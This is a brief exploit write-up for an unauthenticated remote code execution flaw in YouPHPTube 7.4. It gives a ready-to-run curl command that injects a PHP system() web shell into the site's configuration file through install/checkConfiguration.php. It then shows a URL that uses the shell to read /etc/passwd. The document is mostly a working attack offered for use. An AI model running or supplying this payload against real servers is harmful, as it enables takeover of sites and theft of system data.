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YouPHPTube 7.4 Remote Code Execution

#Quick Info


  • In YouPHPTube 7.4, the file install/checkConfiguration.php has no access control, which leads to everyone being able to edit the configuration file, and insert malicious PHP code.




To exploit this, we will generate a new malicious config file using the command above. The databaseName must be unique and databaseHost accessible.

curl -s "TARGET/install/checkConfiguration.php" -d "';system(\$_GET['bots']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=/var/www/html/&webSiteRootURL=/var/www/html/&webSiteTitle=Site-Title-Here&databaseHost="

Visit site and add param bots= to the URL to gain RCE http://put-ip-here/?bots=cat+/etc/passwd.